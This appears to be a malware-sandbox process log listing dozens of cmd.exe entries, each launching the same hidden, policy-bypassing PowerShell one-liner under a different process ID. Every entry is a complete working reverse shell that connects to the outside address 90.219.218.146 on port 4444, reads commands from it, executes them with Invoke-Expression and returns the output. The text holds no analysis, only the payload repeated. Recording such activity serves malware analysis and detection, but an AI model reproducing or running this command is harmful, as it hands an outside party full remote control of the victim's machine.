C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2720
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:212
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2352
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4912
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1624
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4484
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4728
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2904
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1716
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1712
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:5088
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3600
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4028
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3592
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1228
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2964
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3312
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2320
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2448
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4976
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:5032
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1292
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4292
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4488
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:1432
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3732
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4932
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3692
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2996
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4056
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:424
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4688
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2332
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:3360
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:2196
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c " powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('90.219.218.146', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0}; $StreamWriter.Write($String + 'SHELL> '); $StreamWriter.Flush() } WriteToStream ''; while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) { $Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1); $Output = try { Invoke-Expression $Command 2>&1 | Out-String } catch { $_ | Out-String } WriteToStream ($Output) } $StreamWriter.Close()" "3⤵PID:4332
-
-
